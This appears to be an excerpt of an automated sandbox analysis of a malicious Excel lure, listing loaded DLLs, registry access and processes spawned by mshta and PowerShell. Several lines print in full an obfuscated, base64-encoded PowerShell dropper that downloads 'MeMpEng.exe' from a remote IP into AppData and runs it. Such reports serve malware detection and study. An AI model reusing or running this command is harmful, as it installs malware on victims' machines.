    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\MeMpEng.exeSection loaded: wow64win.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\MeMpEng.exeSection loaded: wow64cpu.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: dwmapi.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: rpcrtremote.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: secur32.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: webio.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: winnsi.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: dhcpcsvc6.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: nlaapi.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: dhcpcsvc.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: rasadhlp.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: oleacc.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: sxs.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: credssp.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: ncrypt.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: bcrypt.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: mpr.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: scrrun.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: msls31.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: d2d1.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: dwrite.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: dxgi.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: d3d11.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: winbrand.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: webio.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dll
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\MeMpEng.exeSection loaded: wow64win.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\MeMpEng.exeSection loaded: wow64cpu.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32Jump to behavior
    Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SettingsJump to behavior
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
    Source: Binary string: 7C:\Users\user\AppData\Local\Temp\4xnxdpzb\4xnxdpzb.pdbhP source: powershell.exe, 00000010.00000002.470282539.0000000002672000.00000004.00000800.00020000.00000000.sdmp
    Source: Binary string: 7C:\Users\user\AppData\Local\Temp\nxtolslo\nxtolslo.pdb source: powershell.exe, 00000007.00000002.426492015.0000000002DE3000.00000004.00000800.00020000.00000000.sdmp
    Source: Binary string: 7C:\Users\user\AppData\Local\Temp\nxtolslo\nxtolslo.pdbhP source: powershell.exe, 00000007.00000002.426492015.0000000002EEF000.00000004.00000800.00020000.00000000.sdmp
    Source: Binary string: .pdbptB source: powershell.exe, 00000007.00000002.429105773.000000001C2C7000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: 7C:\Users\user\AppData\Local\Temp\4xnxdpzb\4xnxdpzb.pdb source: powershell.exe, 00000010.00000002.470282539.0000000002672000.00000004.00000800.00020000.00000000.sdmp
    Source: Thermo Fisher RFQ_TFS-1805.xlsInitial sample: OLE indicators vbamacros = False
    Source: Thermo Fisher RFQ_TFS-1805.xlsInitial sample: OLE indicators encrypted = True

    Data Obfuscation

    barindex
    Source: Yara matchFile source: 0000000B.00000002.836188866.000000000492A000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
    Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/C pOwERShEll.eXE -Ex byPasS -NOP -w 1 -C DEvicEcREdeNTIaLdEployment ; Iex($(IEx('[SyStem.TExT.EncODing]'+[CHaR]0X3A+[chAr]0X3a+'UTF8.getsTRIng([sySTEm.CONVErT]'+[CHaR]58+[Char]0x3A+'fROMBASE64StRiNG('+[CHar]34+'JE9TQzgxICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJFUkRFRmluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTG1vTi5kTGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHBGY1pjall6LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBzc1hlUSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZmNVelAsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBZSmdRSEt2LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBVckIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInB1UWd1aERYUXkiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1lU3BhY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgV3JKQWJ0TVcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkT1NDODE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yNDMuMTY2LzM0MC9NZU1wRW5nLmV4ZSIsIiRlblY6QVBQREFUQVxNZU1wRW5nLmV4ZSIsMCwwKTtTdEFydC1TbGVFcCgzKTtzdEFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXE1lTXBFbmcuZXhlIg=='+[CHAr]0X22+'))')))"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOwERShEll.eXE -Ex byPasS -NOP -w 1 -C DEvicEcREdeNTIaLdEployment ; Iex($(IEx('[SyStem.TExT.EncODing]'+[CHaR]0X3A+[chAr]0X3a+'UTF8.getsTRIng([sySTEm.CONVErT]'+[CHaR]58+[Char]0x3A+'fROMBASE64StRiNG('+[CHar]34+'JE9TQzgxICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJFUkRFRmluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTG1vTi5kTGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHBGY1pjall6LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBzc1hlUSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZmNVelAsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBZSmdRSEt2LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBVckIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInB1UWd1aERYUXkiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1lU3BhY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgV3JKQWJ0TVcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkT1NDODE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yNDMuMTY2LzM0MC9NZU1wRW5nLmV4ZSIsIiRlblY6QVBQREFUQVxNZU1wRW5nLmV4ZSIsMCwwKTtTdEFydC1TbGVFcCgzKTtzdEFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXE1lTXBFbmcuZXhlIg=='+[CHAr]0X22+'))')))"
    Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/C pOwERShEll.eXE -Ex byPasS -NOP -w 1 -C DEvicEcREdeNTIaLdEployment ; Iex($(IEx('[SyStem.TExT.EncODing]'+[CHaR]0X3A+[chAr]0X3a+'UTF8.getsTRIng([sySTEm.CONVErT]'+[CHaR]58+[Char]0x3A+'fROMBASE64StRiNG('+[CHar]34+'JE9TQzgxICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJFUkRFRmluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTG1vTi5kTGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHBGY1pjall6LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBzc1hlUSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZmNVelAsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBZSmdRSEt2LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBVckIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInB1UWd1aERYUXkiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1lU3BhY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgV3JKQWJ0TVcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkT1NDODE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yNDMuMTY2LzM0MC9NZU1wRW5nLmV4ZSIsIiRlblY6QVBQREFUQVxNZU1wRW5nLmV4ZSIsMCwwKTtTdEFydC1TbGVFcCgzKTtzdEFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXE1lTXBFbmcuZXhlIg=='+[CHAr]0X22+'))')))"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOwERShEll.eXE -Ex byPasS -NOP -w 1 -C DEvicEcREdeNTIaLdEployment ; Iex($(IEx('[SyStem.TExT.EncODing]'+[CHaR]0X3A+[chAr]0X3a+'UTF8.getsTRIng([sySTEm.CONVErT]'+[CHaR]58+[Char]0x3A+'fROMBASE64StRiNG('+[CHar]34+'JE9TQzgxICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJFUkRFRmluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTG1vTi5kTGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHBGY1pjall6LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBzc1hlUSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZmNVelAsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBZSmdRSEt2LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBVckIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInB1UWd1aERYUXkiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1lU3BhY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgV3JKQWJ0TVcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkT1NDODE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yNDMuMTY2LzM0MC9NZU1wRW5nLmV4ZSIsIiRlblY6QVBQREFUQVxNZU1wRW5nLmV4ZSIsMCwwKTtTdEFydC1TbGVFcCgzKTtzdEFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXE1lTXBFbmcuZXhlIg=='+[CHAr]0X22+'))')))"
    Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/C pOwERShEll.eXE -Ex byPasS -NOP -w 1 -C DEvicEcREdeNTIaLdEployment ; Iex($(IEx('[SyStem.TExT.EncODing]'+[CHaR]0X3A+[chAr]0X3a+'UTF8.getsTRIng([sySTEm.CONVErT]'+[CHaR]58+[Char]0x3A+'fROMBASE64StRiNG('+[CHar]34+'JE9TQzgxICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJFUkRFRmluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTG1vTi5kTGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHBGY1pjall6LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBzc1hlUSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZmNVelAsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBZSmdRSEt2LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBVckIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInB1UWd1aERYUXkiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1lU3BhY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgV3JKQWJ0TVcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkT1NDODE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yNDMuMTY2LzM0MC9NZU1wRW5nLmV4ZSIsIiRlblY6QVBQREFUQVxNZU1wRW5nLmV4ZSIsMCwwKTtTdEFydC1TbGVFcCgzKTtzdEFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXE1lTXBFbmcuZXhlIg=='+[CHAr]0X22+'))')))"Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOwERShEll.eXE -Ex byPasS -NOP -w 1 -C DEvicEcREdeNTIaLdEployment ; Iex($(IEx('[SyStem.TExT.EncODing]'+[CHaR]0X3A+[chAr]0X3a+'UTF8.getsTRIng([sySTEm.CONVErT]'+[CHaR]58+[Char]0x3A+'fROMBASE64StRiNG('+[CHar]34+'JE9TQzgxICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJFUkRFRmluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTG1vTi5kTGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHBGY1pjall6LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBzc1hlUSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZmNVelAsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBZSmdRSEt2LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBVckIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInB1UWd1aERYUXkiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1lU3BhY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgV3JKQWJ0TVcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkT1NDODE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yNDMuMTY2LzM0MC9NZU1wRW5nLmV4ZSIsIiRlblY6QVBQREFUQVxNZU1wRW5nLmV4ZSIsMCwwKTtTdEFydC1TbGVFcCgzKTtzdEFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXE1lTXBFbmcuZXhlIg=='+[CHAr]0X22+'))')))"Jump to behavior
    Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/C pOwERShEll.eXE -Ex byPasS -NOP -w 1 -C DEvicEcREdeNTIaLdEployment ; Iex($(IEx('[SyStem.TExT.EncODing]'+[CHaR]0X3A+[chAr]0X3a+'UTF8.getsTRIng([sySTEm.CONVErT]'+[CHaR]58+[Char]0x3A+'fROMBASE64StRiNG('+[CHar]34+'JE9TQzgxICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJFUkRFRmluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTG1vTi5kTGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHBGY1pjall6LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBzc1hlUSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZmNVelAsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBZSmdRSEt2LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBVckIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInB1UWd1aERYUXkiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1lU3BhY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgV3JKQWJ0TVcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkT1NDODE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yNDMuMTY2LzM0MC9NZU1wRW5nLmV4ZSIsIiRlblY6QVBQREFUQVxNZU1wRW5nLmV4ZSIsMCwwKTtTdEFydC1TbGVFcCgzKTtzdEFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXE1lTXBFbmcuZXhlIg=='+[CHAr]0X22+'))')))"Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOwERShEll.eXE -Ex byPasS -NOP -w 1 -C DEvicEcREdeNTIaLdEployment ; Iex($(IEx('[SyStem.TExT.EncODing]'+[CHaR]0X3A+[chAr]0X3a+'UTF8.getsTRIng([sySTEm.CONVErT]'+[CHaR]58+[Char]0x3A+'fROMBASE64StRiNG('+[CHar]34+'JE9TQzgxICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJFUkRFRmluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTG1vTi5kTGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHBGY1pjall6LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBzc1hlUSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZmNVelAsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBZSmdRSEt2LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBVckIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInB1UWd1aERYUXkiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1lU3BhY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgV3JKQWJ0TVcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkT1NDODE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yNDMuMTY2LzM0MC9NZU1wRW5nLmV4ZSIsIiRlblY6QVBQREFUQVxNZU1wRW5nLmV4ZSIsMCwwKTtTdEFydC1TbGVFcCgzKTtzdEFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXE1lTXBFbmcuZXhlIg=='+[CHAr]0X22+'))')))"
